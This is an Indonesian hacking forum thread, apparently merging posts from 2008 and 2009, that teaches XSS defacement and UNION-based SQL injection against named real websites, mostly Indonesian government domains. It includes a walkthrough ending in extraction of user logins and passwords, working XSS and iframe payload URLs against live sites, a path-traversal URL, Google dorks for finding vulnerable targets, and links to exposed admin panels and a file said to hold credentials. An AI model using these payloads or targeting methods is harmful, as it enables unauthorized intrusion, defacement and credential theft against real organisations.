hacking web main.php diknas.go.id
gungbaster 20-05-2009, 09:07 PM di karenakan banyak yg minat tentang hacking web iseng2 gue copasin aja teknik2 hack web dari beberapa source (sebagian teknik hacking ini masih up to date sebagian dah di patch ama admin situs yg di serang tapi metodenya masih bisa kok) >:D<
1st blood tentang xss neh :D mungkin ada yg nanya apakah Xss itu XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja. 1. pertamanya seh kita kudu cari situs yg vurn (bisa di hacking dengan teknik xss) mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah memfilternya, tapi kita bisa menggunakan google untuk cari neh vurn :D Betul, kita menggunakan Dork dengan query inurl:"search.php?q="atau jika manual kita bisa mencoba fasilitas sebuah site seperti Guest book, Search Box, Shoutboxes, Comment atau forum. 2. Nah sekarang jika sudah kita ketemukan target kita akan mencoba mengexploit site itu dulu, apakah site itu mempunyai vulner terhadap XSS.
Ok sekarang kita coba menginjeksi dengan kode : <script>alert("XSS")3. http://i379.photobucket.com/albums/oo232/h4ck3v1l/xss.jpg << klo muncul gambar ini tuh situs vurn buat di xss 4. tapi apakah sekedar itu saja, sekarang kita coba dengan metoda lain, apakah site itu bisa dideface bro? bisa saja, sekarang kita coba bagaimana mengattack site yang vulner itu ok. dengan penyisipan tag IMG SCR pada sebuah url atau pada comment sekali. Apa itu IMG SCR tu bro? IMG SCR itu adalah semacam Tag pemangilan gambar dari suatu link tertentu untuk ditampilkan kepada website tersebut. pemanggilan tag itu dengan code sebagai berikut
5. tapi terlebih dahulu gambar deface lo bisa upload dulu ke hostingan, misalnya ke photobucket atau flickr. setelah itu ganti url nya dengan url gambar tadi. hingga menjadi seperti seperti berikut :
6. nah setelah siap kemudian sisipkan pada URl situs yang mempunyai bug tadi hingga menjadi seperti contoh : http://www.Target.ac.id/search/?q=
7. kemudian apa yang terjadi??? maka situs yang mempunyai bug tadi akan berubah tampilan menjadi gambar yang kita upload tadi :D 8. metode penyisipan lain selain dengan gambar juga bisa kita lakukan misalnya dengan file flash (SWF) hingga serangan ini mempunyai style tersendiri contoh code yg di gunakan seperti ini >>> <EMBED SRC="http://site.com/xss.swfdengan penyisipan tag tersebut maka akan langsung meng exekusi file SWF pada link tersebut. atau mungkin dengan melakukan redirect ke situs lain misalnya dengan code :<script>window.open( "http://www.google.com/" )9. yg maka jika dieksekusi , kita akan di redirect ke situs google, mungkin biasa aja, tapi gimana klo dibawa ke suatu situs login palsu misalnya fake login yahoo, mungkin bisa berbahaya juga tuh. gue rasa yg lebih master pasti tau apa sebanya ini :D Aurel
[email protected] teknik ke 2 menunya adalah sql injection (targetnya adalah http://www.gunungkidulkab.go.id (http://www.gunungkidulkab.go.id/) << tapi neh web dah di patch adminnya (dolo neh web ancur banget dah banyak yg jebolin sampe gak keitung) :( jadi untuk experiment sendiri cari aja web korbannya sendiri 1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan mengujinya dengan operator logika ( AND ). http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870'2. Halaman akan menampilkan pesan error Fatal error: Call to a member function MoveNext() on a non-object in
/var/www/sites/gunungkidulkab.go.id/gunungkidulkab.go.id/subdomains/www/html/prog ram/publish_content.php on line 225berarti neh situs vurn 3. http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+a nd+1=1 http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+a nd+1=6Hasil Uji : -Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara normal. -Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan (tidak berjalan normal). 4. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakukan penambahan/increment pada variabel num. Parameternya adalah jika field masih tersedia maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai pada angka 14. http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+o rder+by+14--Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-set komentar terhadap sintaks setelah klausa WHERE. Kebetulan pada contoh kasus kali ini, setelah klausa WHERE terdapat perintah sql yg lain entah itu ORDER atau LIMIT. Untuk itu digunakan parameter komentar agar perintah sql tersebut tidak dijalankan sehingga kita mendapatkan pesan error jika field yang di ORDER tidak tersedia. Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukan ORDER BY 1 dan ORDER BY 100 halaman akan tetap menampilkan pesan error. Kalau kejadiannya seperti ini dari mana kita bisa mengetahui jumlah field yang di-select?? 5. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang digunakan adalah UNION+ALL+SELECT+no_field+no_field+.... sampai akhir :D http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=null+u nion+all+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14--6. Pada contoh kali ini, variabel id kita beri nilai null agar angka-angka yang kita deklarasikan keluar, atau bisa juga menggunakan tanda minus (id=-870). Dari angka-angka yang tercetak pada halaman web, kita akan mengeluarkan informasi dari versi mysql, nama database dan nama user. http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+union+all+select+1,2,3,4,5,concat_ws(0x2B,vers ion(),database(),user()),7,8,9,10,11,12,13,14--7. Selanjutnya kita akan mengeluarkan nama-nama tabel dengan perintah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TA BLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_SCHEMA=DATABASE(). Gunakan klausa WHERE TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari database yang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa
WHERE tidak perlu Anda gunakan.http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&i d=-870+union+all+select+1,2,3,4,5,concat_ws(0x2B,vers ion(),database(),user()),7,group_concat(table_name ), 9,10,11,12,13,14+from+information_schema.tables+ where+table_schema=database()-Pada perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) dengan angka 6, jika Anda tidak ingin menampilkan informasi tentang versi mysql, nama database, dan nama user. 8. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna. Pada website ini nama tabel yang dimaksud adalah tblpengguna. Sintaks dasarnya adalah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO LUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='NAMA_TABLE'. Jika terjadi error maka kita harus meng-konversi nama tabel ke bentuk hexadecimal_sql sehingga menjadi 0x74626C70656E6767756E61 http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+union+all+select+1,2,3,4,5,6,7,group_concat(co lumn_name),9,10,11,12,13,14+from+information_schem a.columns+where+table_name=0x74626C70656E6767756E6 1--9. Langkah terakhir kita akan mengeluarkan record-record dari tabel tblpengguna. Sintaks dasarnya UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE. Kalau dijalankan pada contoh kasus kali ini menjadi :http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+union+all+select+1,2,3,4,5,6,7,concat_ws(0x2B, tblpengguna_login,tblpengguna_pass),9,10,11,12,13, 14+from+tblpengguna--p1T4qH@ (
[email protected])Jasakom Security Group (
[email protected]) nb: itu adalah teknik dasar buat sql injektion terkadang di perlukan ketekunan untuk menemukan bug di field dan table nya lo buat bisa injek (pokoknya dalam sql injection modalnya adalah sabar dan jangan bosan :-O klo manual tapi untuk mempermudah biasanya di gunakan berbgai tools buat sql injection :D)
menu ke 3 cara ngeliat forum atau website dengan googlebot (ngeliat tanpa perlu regis) for firefox (ff) 1.step ketikan ini di kolom alamat situs firefox about:config klo sudah entar ada peringatan gak papa masuk aja terus >> entar kalian akan liat string register buat setingan firefox 2. masukan string ini di setingan register ff (bikin string baru dengan format text) general.useragent.extra.firefox maka akan muncul defaultnya >> firefox/3.0.10 << ganti dengan Googlebot/2.X (http://www.googlebot.com/bot.html)
3. restart ff klo bener kalian bisa liat beberapa web atau forum yg kudu regis tanpa perlu regis (di status user akan terlihat ada googlebot << itu elu :D ) sebenernya neh trik lama tapi masih lumayan juga lo :D nb: klo cara ini jalan lo bakalan susah regis di forum yg isa di tembus (soalnya kolom regisnya ilang):P untuk beberapa forum dah gak isa pake cara ini soalnya dah make script baru atau di blok oleh adminnya :D gungbaster 20-05-2009, 09:12 PM turut memanggil penunggu2 dan suhu2 sub forum ini untuk memberikan contoh hasil kerajinannya dan memberikan tambahan (klo ada yg mau dateng :D ) @proceker rasanya lo ada kan hasil xss situs kemaren bisa di tunjukin di sene gak? (buat contoh hasil xss) walah yg di panggil budek gak muncul2 yg gak di panggil malah munculan wkwkwk :D adit83 20-05-2009, 10:31 PM turut memanggil penunggu2 dan suhu2 sub forum ini untuk memberikan contoh hasil kerajinannya dan memberikan tambahan (klo ada yg mau dateng :D ) @proceker rasanya lo ada kan hasil xss situs kemaren bisa di tunjukin di sene gak? (buat contoh hasil xss) iya tuh om proceker masa kgk dateng :P:P nih contohnya ya om: website 4shared:http://www.4shared.com/network/search.jsp?sortType=1&sortOrder=1&sortmod e=2&searchName=adit+pratama&searchmode=2&searchName=adit+pratama&searchDe scription=%22%3E%3Cscript%3Ealert(%27Xss%2 0nya%20kok%20ada%20sih%20by:adit83%27);%3C/script%3E Asu eh asus deh : http://vip.asus.com/eservice/techservok.aspx?SLanguage=enus&caseid=%3Cscript%3Ealert(%22XSS%20ATTACK%20By%20--=====Adit83=====--%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22White%22%3E%3CH1% 3EXSS%20ATTACK%20By%20---=====Adit83=====--%3C/H1%3E%3C/MARQUEE%3E
satu lagi nih indocenter : http://www.indocenter.co.id/bycategory.php?q=Xss%20nya%20ditemukan%20nih%20--=====Adit83=====--gungbaster 20-05-2009, 10:57 PM @adit83 good job :D pembahasan clue code xss adit83 di asus http://vip.asus.com/eservice/techservok.aspx?SLanguage=enus&caseid=%3Cscript%3Ealert(%22 (http://vip.asus.com/eservice/techservok.aspx?SLanguage=enus&caseid=%3Cscript%3Ealert%28%22)XSS%20ATTACK%20By%2 0--=====Adit83=====--%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22White%22%3E%3CH1% 3EXSS%20ATTACK%20By%20---=====Adit83=====--%3C/H1%3E%3C/MARQUEE%3E@buat yg lom tau >:D< untuk code di atas yg gue bold itu bisa di modif2 tulisannya lo sedangkan yg tulisan warna biru itu buat warna isa di modif2 kok itu :D masih ada beberapa yg bisa di modif lagi silahkan temukan di mana :D nb: umumnya xss bekerja di client side aja 99hehe99 20-05-2009, 11:30 PM Maap OOT kalo Pake Browser Musti Di mna ya? Nemesis 20-05-2009, 11:53 PM wah pd jago2X yah... /no1 ajarin dong... kalo aq sih bisanya cuma yg kayak gini : http://www.21stcentury.com.my/chinese/sendmail.asp?url=%3Cdiv+align%3D%22center %22+style %3D%22width%3A1024px%3B+height%3A5768px%3B+positio n%3Aabsolute%3B+left%3A0%3B+top%3A0%3B+background% 3A%23000000%3B+zindex%3A+1000%3B%22+%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C br%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+siz e%3D5%3EINI+CONTOH+%5EXSS%5E+%3C%2Ffont%3E%3Cbr%3E %3Cbr%3E%3Cbr%3E%3Cfont+color%3Dsilver+size%3D5%3E %3Cb%3ENEMESIS+WAS+HERE%3C%2FB%3E%3C%2Ffont%3E%3Cb r%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+size%3D5%3 EGW+UDAH+NGASIH+TAU+ADMINNYA+TAPI+TETEP+AJA+NGGA+D IBENERIN...+YAUDS+TINGGAL+MENANTI+AJAL+HEE...%3C%2
Ffont%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3 Cbr%3E%3C%2Fdiv%3E http://www.tutor.com.my/tutor/ppk/index.asp?sec=%3Cdiv+align%3D%22center%22+st yle%3D %22width%3A1024px%3B+height%3A5768px%3B+position%3 Aabsolute%3B+left%3A0%3B+top%3A0%3B+background%3A% 23000000%3B+zindex%3A+1000%3B%22+%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C br%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+siz e%3D5%3ENEMESIS+WAS+HERE%3C%2Ffont%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cfont+color%3Dsilver+size%3D5%3E%3Cb% 3EIndonesia+Tidak+akan+pernah+mati..+Kami+siap+Mem bela+sampai+akhir+hayat%3C%2FB%3E%3C%2Ffont%3E%3Cb r%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+size%3D5%3 EHEI+MALAYSIA+JANGAN+PERNAH+MENCURI+KEBUDAYAAN+KAM I+OR+YOU'LL+DIE...!!%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E% 3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%2Fdiv%3E http://simplyiyo.com/?s=%3Cscript%3Ealert%28%22NEMESIS+WAS+HERE%22%29 %3 C%2Fscript%3E http://www.kbistari.uum.edu.my/merdeka/content/users/login.asp?error=CONTOH%20X SS%20NEMESIS%20WAS%20HER E%20 http://www.cooperativefuneraire.ca/admin/Error.asp?error=NEMESIS%20WAS%20HER E http://www.epu.jpm.my/db2007/guest/G02LOGIN.asp?ShowMess=NEMESIS%20WAS %20HERE gungbaster 21-05-2009, 12:14 AM Maap OOT kalo Pake Browser Musti Di mna ya? maksudnya? :-/ wah pd jago2X yah... /no1 ajarin dong... kalo aq sih bisanya cuma yg kayak gini : http://www.21stcentury.com.my/chinese/sendmail.asp?url=%3Cdiv+align%3D%22center %22+style %3D%22width%3A1024px%3B+height%3A5768px%3B+positio n%3Aabsolute%3B+left%3A0%3B+top%3A0%3B+background%
3A%23000000%3B+zindex%3A+1000%3B%22+%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C br%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+siz e%3D5%3EINI+CONTOH+%5EXSS%5E+%3C%2Ffont%3E%3Cbr%3E %3Cbr%3E%3Cbr%3E%3Cfont+color%3Dsilver+size%3D5%3E %3Cb%3ENEMESIS+WAS+HERE%3C%2FB%3E%3C%2Ffont%3E%3Cb r%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+size%3D5%3 EGW+UDAH+NGASIH+TAU+ADMINNYA+TAPI+TETEP+AJA+NGGA+D IBENERIN...+YAUDS+TINGGAL+MENANTI+AJAL+HEE...%3C%2 Ffont%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3 Cbr%3E%3C%2Fdiv%3E http://www.tutor.com.my/tutor/ppk/index.asp?sec=%3Cdiv+align%3D%22center%22+st yle%3D %22width%3A1024px%3B+height%3A5768px%3B+position%3 Aabsolute%3B+left%3A0%3B+top%3A0%3B+background%3A% 23000000%3B+zindex%3A+1000%3B%22+%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C br%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+siz e%3D5%3ENEMESIS+WAS+HERE%3C%2Ffont%3E%3Cbr%3E%3Cbr %3E%3Cbr%3E%3Cfont+color%3Dsilver+size%3D5%3E%3Cb% 3EIndonesia+Tidak+akan+pernah+mati..+Kami+siap+Mem bela+sampai+akhir+hayat%3C%2FB%3E%3C%2Ffont%3E%3Cb r%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3Dred+size%3D5%3 EHEI+MALAYSIA+JANGAN+PERNAH+MENCURI+KEBUDAYAAN+KAM I+OR+YOU'LL+DIE...!!%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E% 3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%2Fdiv%3E
http://simplyiyo.com/?s=%3Cscript%3Ealert%28%22NEMESIS+WAS+HERE%22%29 %3 C%2Fscript%3E
http://www.kbistari.uum.edu.my/merdeka/content/users/login.asp?error=CONTOH%20X SS%20NEMESIS%20WAS%20HER E%20 http://www.cooperativefuneraire.ca/admin/Error.asp?error=NEMESIS%20WAS%20HER E http://www.epu.jpm.my/db2007/guest/G02LOGIN.asp?ShowMess=NEMESIS%20WAS %20HERE suhu nya dateng :D thk alot bro nemesis nambahin contoh pengunaan xss yg kompleks :D (kompleks tulisannya ) :D liat yg gue bold di contoh om nemesis itu bisa jadi dork buat cari vurn situs2 dengan basic asp buat xss atau sql di guugle :D ProHacker 21-05-2009, 12:52 AM yoi master master suhu suhu nais jobs semua.... kalo dapet md5 bisa ditest disini jg :D, kalo ad waktu jng lupa sumbang wordlist klo ada word yg dari site laen yg kecrack www.unlounge.co.cc xss ya... coba bgini <script>alert('document.cookie') or <script>document.write('document.cookie') (note: mungkin loh itu session id nya orang... hehe) klo yg xss web vuln waktu itu ada di thread nya om ievan GhanDoz3n 21-05-2009, 12:29 PM http://www.petra.ac.id/search/?q=%3Cscript%3Ealert(%22Raffi%20ahmad%20ganteng% 22 )%3C/script%3E%3Cscript%3Ealert(%22GhanDoz3n%20lebih%20 ganteng%22)%3C/script%3E%3Cmarquee%20behavior=%22alternate%22%20b gcolor=%22red%22%3E%3Cb%3EGhandoz3n%20Ganteng%3C/b%3E%3C/marquee% 3E [code] ProHacker 21-05-2009, 09:07 PM rusnya taro di threadnya om ievan aja... contoh kan cm butuh 1 :D gungbaster 21-05-2009, 11:37 PM hooh sebenernya neh trid buat edu seh jadi contohnya 1 1aja ya :D klo bisa bantu tambahin masukan teknik atau trik atau tools buat hacking2 :D
adit83 23-05-2009, 07:51 PM gua ada lagi nih site XSS: http://www.ecom.depkominfo.go.id/cari.php?cari=per%20usahaancari.php?hasil=perusah a an&nama=%3Ciframe%20%20src=%22http://adi83.110mb.com/index.html%22%20widt h=800%20he%20ight=600%3E%3C/iframe%3E cotutgaulCoraSolar 23-05-2009, 08:17 PM gw bookmark dulu. praktek nya besok okeh om :D gungbaster 24-05-2009, 12:23 AM gua ada lagi nih site XSS: http://www.ecom.depkominfo.go.id/cari.php?cari=per%20usahaancari.php?hasil=perusah a an&nama=%3Ciframe%20%20src=%22http://adi83.110mb.com/index.html%22%20widt h=800%20he%20ight=600%3E%3C/iframe%3E contohnya cukup dah X( gak usah show off mending kasih masukan teknik2 hack buat pemula ketimbang cuman nunjukin hasil yg xss cs doang X( dan jangan junk yg gak penting atau gue batain lo :mad: adit83 24-05-2009, 12:34 AM ^ ok deh om gung gua gak bakal show off lagi dah gua diem aja liatin orang2/ suhu2 IF yang jago2 ya !! gungbaster 24-05-2009, 04:36 AM ^ bukan masalah jago tapi sesuaikan lah ama tridnya neh kan judulnya edu bukan buat show off klo buat show off dah ada trid nya (tridnya evanish). kita sama2 belajar di sene jadi jadi gak ada yg jago atau copo oke. dan gue pribadi gak percaya ama peringkat dalam dunia hacker adit83 24-05-2009, 10:26 AM ^ ih wew om ajarin bikin shell dong soalnya gua slalu copas om klo masalah shell ProHacker 25-05-2009, 12:16 AM ^ zzz blajar php sanah....
adit83 25-05-2009, 02:57 PM ^ iyadah yang udah jago jgn sombong dong ProHacker 25-05-2009, 03:21 PM ^ zzz sapa yg sombong gk kebalik ya :D.... katanya mo buat shell yauda gw kasi tau blajar php ====== coba periksa group unlounge.... disanah ada dummy web /gg adit83 25-05-2009, 03:27 PM ^ weq apanya yang kebalik,, bikinin ebooknya aja jadi gampang bacana gungbaster 26-05-2009, 12:38 AM zzzzzzzzzz malah debat kusir yg gak jelas di trid gue :mad: last warning or i send bata combo :mad: wirosablenk 02-06-2009, 03:11 PM thanks bro gung.......... nice tutor..jd tambah pinter neh b4dS3cT0r 03-06-2009, 12:16 PM http://www.mbiberlin.de/en/websearch/search.php?q=%3Cscript%3Ealert(%22XSS%20bad_s3ctor %20was%20here%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22White%22 %3E%3CH1% 3EXSS%20Numpang%20Lewat%20Gw(b4d_s3ct0r)%20ada%20D isini%3C/H1%3E%3C/MARQUEE%3E GhanDoz3n 03-06-2009, 02:12 PM @tas kan dah dibilang g usah nmbah contoh lgi b4dS3cT0r 04-06-2009, 11:38 AM Iye dech maafin GhanDoz3n 06-06-2009, 12:09 PM saya maafkan.....
situs etrading.co.id https://www.etrading.co.id/newetrading/index1.php?ar_id=5248%20union%20select%20all%201 situs incs-network.org http://www.incs-network.org/ silahkan dicari yg lain nya sebab saya lihat ada banyak lubang disana yang bisa merugikan client nya AhmadRusli 11th June 2008, 11:57 ---------------situs etrading.co.id Tes 1: Diflush dulu databasenya yang di server. Kaenya mereka lupa ngeflush. Biasanya setelah diflush akan hilang sendiri.
Tes 2: Paksa php.ini untuk show errornya=Off, jika punya akses ke sini. Jika tidak, tambahkan error_reporting(0); di: index1.php
---------------situs incs-network.org Tes 1: Diflush dulu databasenya yang di server. Kaenya mereka lupa ngeflush.
Biasanya setelah diflush akan hilang sendiri. Tes 2: Paksa php.ini untuk show errornya=Off, jika punya akses ke sini. Jika tidak, tambahkan error_reporting(0); di: index.php ---------------Mudah2an bisa yaah. cyberpunk 11th June 2008, 19:29 saya ga tahu, ini dah lama apa masih hangat... silakan dicoba aja dulu http://tsm.co.id/deperindag/ ZaenalAbidin 11th June 2008, 20:39 lubang apa nih? lubang perawan...? :p bagaimana cara mencobanya? ada tutorial? :) AhmadRusli 11th June 2008, 21:50 sudah saya laporkan ke situsnya dari tadi siang. tapi sampe jaaaaaam sekarang nggak dibenerin juga.. berarti adminnnnnya nggak ngurusssss tuh situssssss!!!!!! AhmadRusli 11th June 2008, 21:55 saya ga tahu, ini dah lama apa masih hangat... silakan dicoba aja dulu http://tsm.co.id/deperindag/ wahh.. parah ya tampilan situsnya. bahkan di bagian adminnya bisa kelihatan databasenya.. wah.. tapi yang pasti sampe sekarang adminnya nggak ngecek. laporin dulu aah.. cyberpunk 12th June 2008, 10:33 btw, pake dorks ini aja om di google (cmiiw) sql error site:go.id ini ada beberapa hasilnya :D http://utara.jakarta.go.id/forum/viewforum.php?f=1&sid=bc9bc4c02e7a6b56d93ff1f7b90 d2fed http://www.dikmenum.go.id/index.php?page=11&entr=134%3Cbr anyway, please don`t abuse your power :) egint 17th June 2008, 17:16
update bug2 baru lg dunkz.... :) ad scanner bwt vulnerbility web yg free ga?? r3ck0rd 17th June 2008, 17:32 scannernya? ya Google :D egint 17th June 2008, 17:33 scannernya? ya Google :D :iagree: :lol::lol::lol::lol::lol::lol: bener bngt br0... tp kan mksdny bntk software gt... hehehe cyberpunk 20th June 2008, 19:17 *** for educational purpose only *** google dorks nya +error site:kotabekasi.go.id contoh :) http://www.kotabekasi.go.id/content/script/fusi_exp.php?qrF=C%3A%5Cboot.ini perhatikan baik2 bagian `qrF' :D variabel itu bisa diganti dengan yg lain, silakan cari sendiri ya :D Zniper 26th June 2008, 08:23 wuidih pada jago2... tapi kalo boleh tahu apa aja sih yang biasa dilakukan hacker di site yang vulner??? ada cara penanggulangannya gak?? faishal 26th June 2008, 10:37 wuidih pada jago2... tapi kalo boleh tahu apa aja sih yang biasa dilakukan hacker di site yang vulner??? ada cara penanggulangannya gak?? Kalo nemu gitu kalo para scanner kalo yang iseng ya ... di hack tuh website. Tapi kalo yang baek bisanya akan hubungi admin websitenya. biar ga kena, mesti di update securitynya, pacth untuk website CMS. cyberpunk 26th June 2008, 15:23
http://sida.lan.go.id/phpMyAdmin/ disclaimer: ***** for educational purpose only ***** dead 27th June 2008, 01:35 http://sida.lan.go.id/phpMyAdmin/ disclaimer: ***** for educational purpose only ***** mantab :clap: common|people 27th June 2008, 09:36 wah.. udah dikasihtau blom ni admin nya? maskumambang1 27th June 2008, 11:01 wah beneran ni ........ telanjang :getok::getok: egint 27th June 2008, 17:45 http://sida.lan.go.id/phpMyAdmin/ disclaimer: ***** for educational purpose only ***** :iagree::iagree::iagree: gileee nihh,..... :clap::clap::clap::clap::clap::clap::clap: aerialsky 28th June 2008, 14:14 Situs tanpa busana (bolong2) bisa melanggar UU Pornografi dan Pornoaksi nih... hehehe Buat belajar memang paling enak pake situs Indonesia...hihihihttp://www.emoticon.itonlinestore.net/emoticon/Emoticon/a29.gif aliefte 28th June 2008, 22:11 http://sida.lan.go.id/phpMyAdmin/ disclaimer: ***** for educational purpose only ***** salut ma bro yg satu ini.. :clap::clap::lol: :iagree: :cheers::cheers: imcw 28th June 2008, 22:50 Ternyata memiliki sebuah situs bikin spot jantung juga ya? cyberpunk
1st July 2008, 08:14 disclaimer: *** for educational purpose only *** maaf jika repost, yg ini belum dilaporin ke adminnya, silakan rekan2 laporkan ya... thank you. berikut ini URL nya: http://www.deptan.go.id/admin/ untuk informasi login (user/pass) silakan baca dibagian paling bawah pada file ini: http://www.deptan.go.id/news/admin/file/log_kerjaan_web_deptan.txt p/s: please dont abuse your power :D fifian 1st July 2008, 16:18 disclaimer: *** for educational purpose only *** maaf jika repost, yg ini belum dilaporin ke adminnya, silakan rekan2 laporkan ya... thank you. berikut ini URL nya: http://www.deptan.go.id/admin/ untuk informasi login (user/pass) silakan baca dibagian paling bawah pada file ini: http://www.deptan.go.id/news/admin/file/log_kerjaan_web_deptan.txt p/s: please dont abuse your power :D apa admin nya juga putus asa ? ... payah nih aerialsky 1st July 2008, 17:12 apa admin nya juga putus asa ? ... payah nih Lagian klo di Indonesia admin yg gak becus tetap aja tuh dipelihara... http://www.foxqq.com/biaoqing/xiaoyangcongtuo/3BDE5CE773EEDBF3BD8BE45EAA 8BD820.gif Udah pecat aja tuh... pecat10X http://www.foxqq.com/biaoqing/xiaoyangcongtuo/EDF77A89C94964E60D07457EBCE E9766.gif ~airiRin~ 1st July 2008, 17:39 disclaimer: *** for educational purpose only *** maaf jika repost, yg ini belum dilaporin ke adminnya, silakan rekan2 laporkan ya... thank you. berikut ini URL nya: http://www.deptan.go.id/admin/ untuk informasi login (user/pass) silakan baca dibagian paling bawah pada file ini: http://www.deptan.go.id/news/admin/file/log_kerjaan_web_deptan.txt p/s: please dont abuse your power :D Wkwkwk..
Gw gak tau siapa adminnya.. Tapi yg pasti adminnya udah pasrah kaya' gitu.. :D dead 1st July 2008, 22:35 disclaimer: *** for educational purpose only *** maaf jika repost, yg ini belum dilaporin ke adminnya, silakan rekan2 laporkan ya... thank you. berikut ini URL nya: http://www.deptan.go.id/admin/ untuk informasi login (user/pass) silakan baca dibagian paling bawah pada file ini: http://www.deptan.go.id/news/admin/file/log_kerjaan_web_deptan.txt p/s: please dont abuse your power :D http://forum.detikinet.com/attachment.php?attachmentid=570&stc=1&d=1214926474 deface apa gak ya :D imcw 2nd July 2008, 05:28 Kasihan situs pemerintah dengan biaya milyaran koq ya nggak terurus begitu. maskumambang1 2nd July 2008, 07:00 tapi rata-rata informasi situs-situs yang dikerjain banyakan situs pemerintah, apa udah jijay sama pemerintah ?? :getok::getok::getok: common|people 2nd July 2008, 08:35 http://forum.detikinet.com/attachment.php?attachmentid=570&stc=1&d=1214926474 deface apa gak ya :D nekat bener ni admin... lupa masukin .htaccess nya ya... aerialsky 2nd July 2008, 08:59 Kasihan situs pemerintah dengan biaya milyaran koq ya nggak terurus begitu. tapi rata-rata informasi situs-situs yang dikerjain banyakan situs pemerintah, apa udah jijay sama pemerintah ?? :getok::getok::getok: nekat bener ni admin... lupa masukin .htaccess nya ya... Wong mereka yang kasih jalan kok, ya salahnya sendiri dong... Mau biaya segeda apapun, klo gak diurus sama aja buang2 duit rakyat. Dananya ketahuan banget dikorupsi ato adminnya makan gaji buta. Depkominfo yang harusnya ngecek tiap situs pemerintah, klo ada yang bolong ditambal, di manage yang bener gituuu...
Jadi jangan salahkan kita2 ini klo situs pemerintah kena *****. http://www.foxqq.com/biaoqing/youxihou/youxihouXiao/2B1C4DFD3E0BB16193CB1E ABBCE3A5D4.GIF Kejahatan bukan hanya karena ada niat dari pelakunya, tapi juga karena ada kesempatan. http://www.foxqq.com/biaoqing/youxihou/youxihouXiao/2F0670A0AC1B6931EB65028 D0719C548.gif Asik banget nih buat mainan para newbie... khihihihi rinoboy 2nd July 2008, 15:16 adminnya **** juga....masa servernya gak diurus sih smp2 banyak yg bisa masuk buat liat2 database server-nya Obito 2nd July 2008, 15:47 buang2 duit saja tuh .. .. .. kLo duitnya sindiri sie gpp, La itu kan duit rakyat .. .. .. !! zoenix 4th July 2008, 11:28 dibayar brapa sih adminnya, masa ngubah pswd aja ga mau... maskumambang1 4th July 2008, 13:53 masih, asli ! udah beberapa hari ga dirubah-rubah :getok::getok::getok: kasian .......:getok::getok: cyberpunk 4th July 2008, 23:43 maaf klo repost, yg ini mysqladmin di server windows (cmiiw). urlnya 